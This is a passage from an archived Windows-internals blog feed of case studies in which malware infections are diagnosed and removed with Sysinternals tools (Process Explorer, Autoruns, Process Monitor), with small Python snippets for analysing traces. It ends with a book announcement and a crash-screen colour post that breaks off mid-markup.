However, I found that trying to run anything - whether part of Windows or third-party - resulted not in the execution of the application, but in the display of the same “Security Warning” dialog reporting that the application was infected. This system was truly unusable. </P> <P> The infected account was the only one configured, so that ruled out trying to clean from a different account in the hope that it might not be infected. I was afraid that cleaning the malware might require off-line access to the system via a boot CD installed with the <A href="#" target="_blank"> Microsoft Diagnostic and Repair Toolset </A> (the Microsoft product that’s the descendant of <A href="#" target="_blank"> ERD Commander </A> , the product I created at <A href="#" target="_blank"> Winternals Software </A> ). My MSDaRT CD was at home and I’d have to burn a new one. But I had noticed when I logged on that it was 5-10 seconds before the first popups started appearing. If the malware didn’t block running applications during that time window, either because it was initializing or just letting the first few logon applications run so that the Explorer could fully start, I might be able to sneak Process Explorer and <A href="#" target="_blank"> Autoruns </A> in before the lockdown. That would save me the time and trouble of burning a CD. It was worth a try. </P> <P> Before logging off, I copied Process Explorer and Autoruns to the desktop for easy access. I logged on and double-clicked the icons in quick succession. There was a short pause and then both applications appeared. It had worked! I had to wait for the avalanche of warning dialogs to stop and then turned my attention to Process Explorer. 
Sure enough, one process stood out, hgobsysguard.exe: </P> <P> <IMG alt="image" border="0" height="75" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/4505.image_5F00_thumb_5F00_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121298i2530A319E0EB4D68" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> I explain the common characteristics of malware in my <A href="#" target="_blank"> Advanced Malware Cleaning </A> presentation and this sample had all the telltale signs: </P> <UL> <LI> <STRONG> Random or unusual name: </STRONG> hgobsysguard.exe seems like it might be legitimate, but I had never seen or heard of it and the name revealed nothing of its purpose or origin </LI> <LI> <STRONG> No company name or description: </STRONG> legitimate software almost always includes a company name and description in the version resource of its executables. Malware often omits this since most users never run tools that show this information. </LI> <LI> <STRONG> Installed somewhere other than the \Program Files directory: </STRONG> you should add software not installed in the \Program Files directory to the list of suspects for closer inspection. In this case the executable was installed in the user’s profile, another sign of malware. </LI> <LI> <STRONG> Encrypted or compressed: </STRONG> In order to avoid detection by antivirus and make analysis more difficult, malware authors often encrypt their executables. Process Explorer uses heuristics to try to identify encrypted executables, which it refers to as “packed”, and it highlights them in purple like it did for this one. 
</LI> </UL> <P> I carefully studied the other running executables, including the services running within the various Svchost.exe hosting processes, but I didn’t see anything else that looked suspicious. Sometimes malware employs the “buddy system”, where it uses two processes, each watching the other so that if either terminates, the other restarts it, making it virtually impossible to terminate them. When I see that I use Process Explorer’s suspend feature to put both to sleep and then kill them (which is also arguably more humane). Here all I had was one malicious process, so I just terminated it. It didn’t reappear, which was a good sign that there wasn’t a buddy lurking within another process as a DLL. I then navigated to the malware’s install directory and deleted its files. </P> <P> With the process and executables out of the way, the next step was to determine how the malware activated and delete its autostart entries. I switched to Autoruns, which had finished its scan in the meantime, and spotted two entries pointing at the malware’s executable. Both entries had names that appeared to have been randomly generated, consistent with typical malware: </P> <P> <IMG alt="image" border="0" height="203" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/6747.image_5F00_thumb_5F00_5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121299i51901ADC9D6E3089" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> I deleted the entries, studied the rest in case there was some other component that wasn’t so obvious, and did some standard crapware cleanup while I was there. I rebooted the system and logged back on to confirm it was clean. 
This time there were no popups, I was able to run software as normal, and neither Process Explorer nor Autoruns showed any sign of more infection. I had spent a total of five minutes and had some fun outwitting the malware to avoid offline cleaning. Case closed. </P> </BODY></HTML> Thu, 27 Jun 2019 07:12:03 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-unusable-system/ba-p/724007 MarkRussinovich 2019-06-27T07:12:03Z The Case of the Sysinternals-Blocking Malware https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-sysinternals-blocking-malware/ba-p/723997 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Mar 06, 2011 </STRONG> <BR /> <P> Continuing the theme of focusing on malware-related cases (last week I posted <A href="#" target="_blank"> The Case of the Malicious Autostart </A> ) as a lead-up to the publication on March 15 of my novel <A href="#" target="_blank"> Zero Day </A> , this post describes one submitted to me by a user who took a unique approach to cleaning an infection when faced with the apparent inability to run <A href="#" target="_blank"> Sysinternals </A> utilities. </P> <P> More and more often, malware authors target antivirus products and Sysinternals utilities in an effort to maintain their grip on a conquered system. This case began when the user’s friend asked if he’d take a look at his computer, which had begun taking an unusually long time to boot and log on. The friend, already suspecting that malware might be the cause, had tried to run a <A href="#" target="_blank"> Microsoft Security Essentials </A> (MSE) scan, but the scan would never complete. They also hadn’t spotted anything in Task Manager. </P> <P> The user, familiar with Sysinternals, tried following the malware cleaning recipe I presented in my <A href="#" target="_blank"> Advanced Malware Cleaning presentation </A> . 
Double-clicking on <A href="#" target="_blank"> Process Explorer </A> resulted in a brief flash of the Process Explorer UI followed by the termination of the Process Explorer process, however. He turned to <A href="#" target="_blank"> Autoruns </A> next, but the result was the same. Process Monitor had the same behavior and at this point he became convinced the malware was responsible. </P> <P> Malware can use numerous techniques to identify software that it wants to disable. For example, it can use the hash of the software’s executables, look for specific text in the executable images, or scan process memory for keywords. The fact that any small unique attribute is all that’s needed is the reason I haven’t bothered implementing mechanisms aimed at preventing identification. It’s a game I can’t win so I leave it to the ingenuity of the user to figure out a workaround. If the malware is simply keying off the names of executables, for instance, the user could simply rename the tools. </P> <P> What makes this case somewhat ironic is that malware authors have long used various Sysinternals tools themselves. For example, the <A href="#" target="_blank"> Clampi trojan </A> , which spread in early 2009, used the <A href="#" target="_blank"> Sysinternals PsExec </A> utility to automatically spread. <A href="#" target="_blank"> Coreflood </A> , a virus that stole passwords in mid-2008, also used PsExec. More recently, <A href="#" target="_blank"> Chinese hackers used Sysinternals tools </A> to attack oil refineries. 
Malware authors even hijacked the Sysinternals brand by releasing a “scareware” product – malware that presents fake security dialogs to lure you into buying fake antimalware – named <A href="#" target="_blank"> Sysinternals Antivirus </A> : </P> <P> <IMG alt="image" border="0" height="421" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/8611.image_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121291i77C79FD39276A2C5" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Back to the case, the user, wondering if the malware was looking for particular processes or simply scanning for windows with certain keywords in their title bars, opened Notepad, typed some text, and saved it to a file named “process explorer.txt”. Sure enough, when he double-clicked on the new text file, Notepad made a brief appearance before exiting. </P> <P> Locked out of his usual troubleshooting tools, he wondered if there might be some other Sysinternals utility that he could leverage, browsed to the <A href="#" target="_blank"> Sysinternals utilities index </A> and scanned the list. Just a few tools down, the <A href="#" target="_blank"> Desktops </A> utility caught his attention. Desktops lets you create up to three additional virtual desktops for running your applications and use hotkeys or the Desktops taskbar dialog to quickly switch between them. Maybe the malware would ignore windows on alternate desktops? He launched Desktops using its Sysinternals Live link (which lets you execute the utilities off the Web without even having to download them) and created a second desktop. Holding his breath, he double-clicked on the Process Explorer icon – and it launched! 
</P> <P> <IMG alt="image" border="0" height="416" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/1030.image_5F00_thumb_5F00_5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121292i9CED7A0905E847F0" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> This particular malware presumably has a timer-based routine that queries window title text and terminates processes that have titles with blocked keywords like “process explorer”, “autoruns”, “process monitor” and likely the names of other advanced malware-hunting tools and common antivirus products. Because a window enumeration only returns the windows on a process’s current desktop, the malware was not able to see the Sysinternals tools running on the second desktop. </P> <P> He didn’t spot anything unusual in the Process Explorer process list, so he launched Process Monitor (I would have tried Autoruns next). He let Process Monitor capture a couple of minutes of activity and then began examining the trace. His eye was immediately drawn to thousands of Winlogon registry operations, something he normally didn’t observe when he ran Process Monitor. 
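</P> <P> Spotting that kind of outlier does not have to rely on eyeballing the trace. As a rough sketch, assuming the trace has been saved from Process Monitor as CSV with the default “Process Name” and “Operation” columns, a few lines of Python can tally registry operations per process. The sample rows below are made up for illustration and are not from this case. </P>

```python
import csv
import io
from collections import Counter


def registry_ops_by_process(csv_text):
    """Count registry operations (names starting with "Reg") per process."""
    counts = Counter()
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Operation"].startswith("Reg"):
            counts[row["Process Name"]] += 1
    return counts


# Made-up rows in the assumed default export layout.
HEADER = '"Time of Day","Process Name","PID","Operation","Path","Result","Detail"\n'
SAMPLE = (
    HEADER
    + '"10:00:00.0","winlogon.exe","612","RegQueryValue","HKLM\\SOFTWARE\\Example","SUCCESS",""\n' * 3
    + '"10:00:01.0","explorer.exe","1480","RegOpenKey","HKCU\\Software\\Example","SUCCESS",""\n'
    + '"10:00:02.0","explorer.exe","1480","ReadFile","C:\\Example\\file.txt","SUCCESS",""\n'
)

# List processes from most to fewest registry operations.
for process, count in registry_ops_by_process(SAMPLE).most_common():
    print(process, count)
```

<P> A process that dominates the tally on an otherwise idle system is a reasonable place to point a filter. </P> <P>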
Guessing that it was related to the malware, he set a filter to just include Winlogon and took a closer look: </P> <P> <IMG alt="image" border="0" height="112" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/4666.image_5F00_thumb_5F00_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121293i99752F78FB2CCA2C" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Most of the operations were registry queries of values under a key with a bizarre name, HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\acdcacaeaacbafbeaa. In order to start every time Windows boots, the malware appeared to have registered itself as a <A href="#" target="_blank"> Winlogon notification DLL </A> . Winlogon notification DLLs are commonly used by software that monitors logon, logoff and password change events, but are also often hijacked by malware. To confirm his suspicion and find the name of the DLL, he right-clicked on one of the entries and selected “Jump To” from the Process Monitor context menu. In response, Process Monitor executed Regedit and navigated to the referenced key: </P> <P> <IMG alt="image" border="0" height="80" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/5557.image_5F00_thumb_5F00_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121294i04E32AF681113379" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> The DLLName value pointed at the malicious DLL, which had the same name - probably randomly generated – as the registry key. 
He knew at this point that the malware was probably interfering with the MSE scan, but armed with the name of the DLL, he wondered if MSE might be able to clean that specific file. Before he tried that he tried a full scan, weakly hoping that the malware wouldn’t detect the execution on the second desktop, but was unsuccessful. He launched MSE again and navigated the file-scan dialog to the DLL. A couple of seconds later MSE completed the analysis and reported that it both knew the malware and was able to automatically clean it: </P> <P> <IMG alt="image" border="0" height="281" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/4571.image_5F00_thumb_5F00_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121295i3DEACA21937D2815" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> He pressed the recommended action button and MSE quickly dispatched the malware. As a final check, he rebooted the system. Sure enough, the system booted quickly and the logon was fast. He was able to run the Sysinternals tools on the main desktop and Process Monitor’s trace was devoid of the malicious activity. With the help of a Sysinternals tool, he had vanquished the Sysinternals-blocking malware and successfully closed the case. 
</P> </BODY></HTML> Thu, 27 Jun 2019 07:11:29 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-sysinternals-blocking-malware/ba-p/723997 MarkRussinovich 2019-06-27T07:11:29Z The Case of the Malicious Autostart https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-malicious-autostart/ba-p/723990 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Feb 26, 2011 </STRONG> <BR /> <P> Given that my novel, <A href="#" target="_blank"> Zero Day </A> , will be published in a few weeks and is based on malware’s use as a weapon by terrorists, I thought it appropriate to post a case that deals with malware cleanup with the Sysinternals tools. This one starts when Microsoft support got a call from a customer representing a large US hospital network reporting that they had been hit with an infestation of the <A href="#" target="_blank"> Marioforever </A> virus. They discovered the virus when their printers started getting barraged with giant print jobs of garbage text, causing their network to slow and the printers to run out of paper. Their antivirus software identified a file named Marioforever.exe in the %SystemRoot% folder of one of the machines spewing files to the printers as suspicious, but deleting the file just resulted in it reappearing at the subsequent reboot. Other antivirus programs failed to flag the file at all. </P> <P> The Microsoft support engineer assigned to the case started looking for clues by seeing if there were additional suspicious files in the %SystemRoot% directory of one of the infected systems. One file, a DLL named Nvrsma.dll, had a recent timestamp and although it was named similarly to Nvidia display driver components, the computer in question didn’t have an Nvidia display adapter. When he tried to delete or rename the file, he got a sharing violation error, which meant that some process had the file open and was preventing others from opening it. 
There are several Sysinternals tools that will list the processes that have a file open or a DLL loaded, including <A href="#" target="_blank"> Process Explorer </A> and <A href="#" target="_blank"> Handle </A> . Because the file was a DLL, though, the engineer decided on the <A href="#" target="_blank"> Sysinternals Listdlls </A> utility, which showed that the DLL was loaded by one process, Winlogon: </P> <P> <IMG alt="image" border="0" height="169" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/2110.image_5F00_thumb_5F00_8.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121281i3791CB047C5F9A4C" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Winlogon is the core system process responsible for managing interactive logon sessions, and in this case was also the host for a malicious DLL. The next step was to determine how the DLL was configured to load into Winlogon. That had to be via an autostart location, so he ran the <A href="#" target="_blank"> Autoruns </A> utility, but there was no sign of Nvrsma.dll and all the autostart entries were either Windows components or legitimate third-party components. That appeared to be a dead end. </P> <P> If he could watch Winlogon’s startup with a file system and registry monitoring utility like <A href="#" target="_blank"> Process Monitor </A> , he might be able to determine the magic that got Winlogon to load Nvrsma.dll. Winlogon starts during the boot process, however, so he had to use Process Monitor’s boot logging feature. When you configure Process Monitor to log boot activity, it installs its driver so that the driver loads early in the boot process and begins monitoring, recording activity to a file named %SystemRoot%\Procmon.pmb. 
The driver stops logging data to the file either when someone launches the Process Monitor executable or when the system shuts down. </P> <P> After configuring Process Monitor to capture boot activity and rebooting the system, the engineer ran Process Monitor and loaded the boot log. He searched for “nvrsma” and found this query by Winlogon of the registry value HKLM\Software\Microsoft\Windows NT\CurrentVersion\bwpInit_DLLs that returned the string “nvrsma”: </P> <P> <IMG alt="image" border="0" height="57" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/7220.image_5F00_thumb_5F00_9.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121282i82E14B78A0D63829" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> The engineer had never seen a value named bwpInit_DLLs, but the name was strikingly similar to an autostart entry point he did know of, AppInit_DLLs. The AppInit_DLLs value is one that User32.dll, the main window manager DLL, reads when it loads into a process. User32.dll loads any DLLs referenced in the value, so any Windows application that has a user-interface (as opposed to being command-line oriented) loads the DLLs listed in the value. 
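</P> <P> The “strikingly similar name” observation can be turned into a simple check over the registry paths seen in a trace. The sketch below is only an illustration under stated assumptions: it uses Python’s standard <CODE>difflib</CODE> to score how closely each value name resembles AppInit_DLLs, the 0.75 threshold is an arbitrary choice, and the small allowlist of genuine value names (AppInit_DLLs, LoadAppInit_DLLs, RequireSignedAppInit_DLLs) is not exhaustive. </P>

```python
from difflib import SequenceMatcher

# Genuine Windows value names that should never be flagged (not exhaustive).
KNOWN_VALUES = {"appinit_dlls", "loadappinit_dlls", "requiresignedappinit_dlls"}


def value_name(path):
    """Return the last component of a registry path."""
    return path.rsplit("\\", 1)[-1]


def lookalike_values(paths, threshold=0.75):
    """Return paths whose value name resembles AppInit_DLLs without matching it."""
    hits = []
    for path in paths:
        name = value_name(path).lower()
        if name in KNOWN_VALUES:
            continue
        if SequenceMatcher(None, name, "appinit_dlls").ratio() >= threshold:
            hits.append(path)
    return hits


SAMPLE_PATHS = [
    r"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs",
    r"HKLM\Software\Microsoft\Windows NT\CurrentVersion\bwpInit_DLLs",
    r"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell",
]

for hit in lookalike_values(SAMPLE_PATHS):
    print(hit)
```

<P> A fuzzy match like this only surfaces candidates; confirming that the value is actually used as an autostart still takes the kind of trace analysis described here. </P> <P>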
Sure enough, a few operations later in the trace he saw Winlogon load Nvrsma.dll: </P> <P> <IMG alt="image" border="0" height="74" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3034.image_5F00_thumb_5F00_10.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121283i5EC751E0A6515F91" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="404" /> </P> <P> Its power to cause a DLL to get loaded into virtually every process has made AppInit_DLLs a favorite of malware authors. In fact, it’s become such a nuisance that in Windows 7 the default policy <A href="#" target="_blank"> requires that DLLs listed in the value be code-signed to be loaded </A> . </P> <P> The boot trace had no reference to AppInit_DLLs, making it obvious that the malware had somehow coerced User32.dll into querying the alternate location. It also explained why the entry hadn’t shown up in the Autoruns scan. One question he had was why no other process had Nvrsma.dll loaded into it, but further into the trace he saw that an attempt to load the DLL by another process resulted in the same sharing violation error he’d encountered: </P> <P> <IMG alt="image" border="0" height="57" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/6747.image_5F00_thumb_5F00_13.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121284i71936B71D7F0DCFE" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Simply loading a DLL won’t cause a handle to remain open and cause this kind of error, so he searched backward, looking for other CreateFile operations on the DLL that had no corresponding CloseFile operation. 
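</P> <P> The idea behind that backward search can be sketched in a few lines of Python. This is only an illustration under stated assumptions: the trace rows are hypothetical, simplified (process, operation, path) tuples rather than real Process Monitor output, the file path is made up, and the function name is my own. It counts opens of a file that were never matched by a close in the same process. </P>

```python
from collections import Counter


def unclosed_opens(events, path):
    """Return {process: count} of opens of path never matched by a close."""
    open_counts = Counter()
    target = path.lower()  # Windows paths are case-insensitive
    for process, operation, event_path in events:
        if event_path.lower() != target:
            continue
        if operation == "CreateFile":
            open_counts[process] += 1
        elif operation == "CloseFile" and open_counts[process] > 0:
            open_counts[process] -= 1
    return {proc: n for proc, n in open_counts.items() if n > 0}


# Hypothetical path and trace rows, for illustration only.
DLL_PATH = r"C:\Windows\System32\nvrsma.dll"
trace = [
    ("explorer.exe", "CreateFile", DLL_PATH),
    ("explorer.exe", "CloseFile", DLL_PATH),
    ("winlogon.exe", "CreateFile", DLL_PATH),
]
print(unclosed_opens(trace, DLL_PATH))
```

<P>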
The last such operation before the sharing violation was performed by Winlogon: </P> <P> <IMG alt="image" border="0" height="75" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/4505.image_5F00_thumb_5F00_14.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121285iAA1D94928FA7E54E" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> The stack of the operation, which he viewed by double-clicking on the operation to open the properties dialog and then clicking on the Stack tab, showed that it was Nvrsma.dll itself that opened the file, presumably to protect itself from being deleted and to prevent itself from loading into other processes: </P> <P> <IMG alt="image" border="0" height="296" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3034.image_5F00_thumb_5F00_16.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121286i23D68557716C8E45" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="304" /> </P> <P> Now he had to determine how User32.dll was compromised. User32.dll is one of the system “Known DLLs”, which means that as a performance optimization Windows creates a file mapping at boot time that can then be used by any process that loads the DLL. These known DLLs are listed in a registry key that Autoruns lists in the KnownDLLs tab, so the engineer went back to the Autoruns scan to take a closer look. The most effective way to spot potential malware when using Autoruns is to run it with the Verify Code Signatures option set, which has Autoruns check the digital signature of the images it finds. 
Upon closer inspection, the engineer noticed that User32.dll, unlike the rest of the Known DLLs, did not have a valid digital signature: </P> <P> <IMG alt="image" border="0" height="329" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/8080.image_5F00_thumb_5F00_11.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121287iEB738A00B027F764" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> The compromised User32.dll behaved almost identically to the actual User32.dll, otherwise applications with user-interfaces would fail, but it seemed to be different enough to cause it to query the alternate registry location. To verify this, he ran the <A href="#" target="_blank"> Sysinternals Sigcheck </A> utility on the tweaked copy and on one from a different, uninfected, system that was running the same release of Windows. A side-by-side comparison of the output, which includes MD5, SHA-1 and SHA-256 cryptographic hashes of the file, confirmed they were different: </P> <P> <IMG alt="image" border="0" height="199" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/4604.image_5F00_thumb_5F00_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121288i7F8907A3F9C16093" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="550" /> </P> <P> As a final check to make sure that the difference was indeed responsible for the different behavior, the engineer decided to scan the strings in the DLL. Any registry keys and values, as well as file names, used by an executable will be stored in the executable’s image file and be visible to a string-scanning tool. 
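</P> <P> As a rough idea of what a string-scanning tool does, the Python sketch below pulls printable ASCII and UTF-16LE strings out of a byte buffer. It is not how Strings or Process Explorer are implemented; the function name, the four-character minimum, and the sample buffer are assumptions made for illustration. </P>

```python
import re


def printable_strings(data, min_len=4):
    """Yield printable ASCII strings, then UTF-16LE strings, from bytes."""
    ascii_pat = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    # UTF-16LE text in the ASCII range is each character followed by a zero byte.
    wide_pat = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    for match in ascii_pat.finditer(data):
        yield match.group().decode("ascii")
    for match in wide_pat.finditer(data):
        yield match.group().decode("utf-16-le")


# Made-up buffer standing in for part of an image file.
sample = (
    b"\x00\x01"
    + "bwpInit_DLLs".encode("utf-16-le")
    + b"\xff\xfe"
    + b"USER32.dll\x00"
)
for text in printable_strings(sample):
    print(text)
```

<P>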
He tried using the <A href="#" target="_blank"> Sysinternals Strings </A> utility, but the sharing violation error prevented Strings from opening the compromised User32.dll, so he turned to Process Explorer. When you open the DLL view for a process and open the properties of a DLL, Process Explorer shows the printable strings on the Strings tab. The results, which revealed the modified AppInit_DLLs string, validated his theory: </P> <P> <IMG alt="clip_image002[4]" border="0" height="466" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3443.clip_5F00_image002_5B00_4_5D005F00_thumb.jpg" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121289iACF942F5DEBD0DFE" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="clip_image002[4]" width="154" /> <IMG alt="image" border="0" height="460" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/8420.image_5F00_thumb_5F00_12.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121290i353D3C4D1F5B8A77" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="154" /> </P> <P> With the knowledge of exactly how the malware’s primary DLL activated, the engineer set out to clean the malware off the system. Because User32.dll would be locked by the malware whenever Windows was online (otherwise you can rename the file and replace it, which is what the malware did), he booted the Windows Preinstallation Environment (WinPE) off a CD-ROM and from there copied a clean User32.dll over the malicious version. Then he deleted the associated malware files he’d discovered in his investigation. When finished, he rebooted the system and verified that the system was clean. 
He closed the case by giving the hospital network administrators the cleaning steps he’d followed and submitted the malware to the Microsoft antimalware team so that they could incorporate automated cleaning into Forefront and the Malicious Software Removal Tool. He’d solved a seemingly impossible case by applying several Sysinternals utilities and helped the hospital get back to normal operation. </P> </BODY></HTML> Thu, 27 Jun 2019 07:10:51 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-malicious-autostart/ba-p/723990 MarkRussinovich 2019-06-27T07:10:51Z Announcing Zero Day, the Novel! https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/announcing-zero-day-the-novel/ba-p/723978 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jan 18, 2011 </STRONG> <BR /> <P> You’ve seen the news if you’re <A href="#" target="_blank"> my friend on Facebook </A> , <A href="#" target="_blank"> follow me on Twitter </A> , or subscribe to the <A href="#" target="_blank"> Sysinternals blog </A> : I’m proud to announce that my first novel, a cyberthriller entitled <I> Zero Day </I> , is due to be published by St. Martin’s Press in mid-March. If you like the <A href="#" target="_blank"> Sysinternals tools </A> or the articles I post on this blog, are interested in computer security, or just enjoy a heart-stopping thriller, I think you’ll like Zero Day. You can find out more and pre-order on the <A href="#" target="_blank"> Zero Day web site </A> and I've started a <A href="#" target="_blank"> Zero Day blog </A> there that will focus exclusively on book and cybersecurity news and tips. <A href="#" target="_blank"> Pre-order now </A> to guarantee a copy on release day and pass the word to your friends! 
</P> <BR /> </BODY></HTML> Thu, 27 Jun 2019 07:09:41 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/announcing-zero-day-the-novel/ba-p/723978 MarkRussinovich 2019-06-27T07:09:41Z “Blue Screens” in Designer Colors with One Click https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/8220-blue-screens-8221-in-designer-colors-with-one-click/ba-p/723977 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jan 09, 2011 </STRONG> <BR /> <P> My <A href="#" target="_blank"> last blog post </A> described how to use local kernel debugging to change the colors of the Windows crash screen, also known as the “blue screen of death”. No doubt many of you thought that showing off a green screen of death or red screen of death to your friends and family would be fun, but the steps involved too complicated. </P> <P> <A href="#" target="_blank"> Alex Ionescu </A> , one of my coauthors on <A href="#" target="_blank"> Windows Internals, 5th Edition </A> (he’s also coauthoring the 6th edition with me and <A href="#" target="_blank"> Dave Solomon </A> , which covers Windows 7 and Windows Server 2008 R2 – scheduled for release this summer), suggested that we make it easy for people to enjoy blue screens of any color. We did so by modifying <A href="#" target="_blank"> Notmyfault </A> , a buggy driver demonstration tool that I wrote for the book and my crash dump analysis presentations. 
Simply make your color selection in the new BSOD color picker dialog, press the “Do Bug” button, and enjoy your creation: </P> <P> <IMG alt="image" border="0" height="451" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/0601.image_5F00_thumb_5F00_28A7EF37.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121279i85726C4F0444ACE9" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="550" /> </P> <P> Here’s the “blue screen” that results from the above color choice: </P> <P> <IMG alt="image" border="0" height="416" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/0028.image_5F00_thumb_5F00_344A47D7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121280i409A1BE47A3D5FFD" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> It’s as easy as that - there’s no need to tweak large-page settings or perform any other system configuration changes like those described in <A href="#" target="_blank"> my last blog post </A> . </P> <P> How does it work? We extended Notmyfault’s kernel-mode driver (named Myfault.sys, as seen on the crash screen, to highlight the fact that user-mode code cannot directly cause a system crash) to register a “ <A href="#" 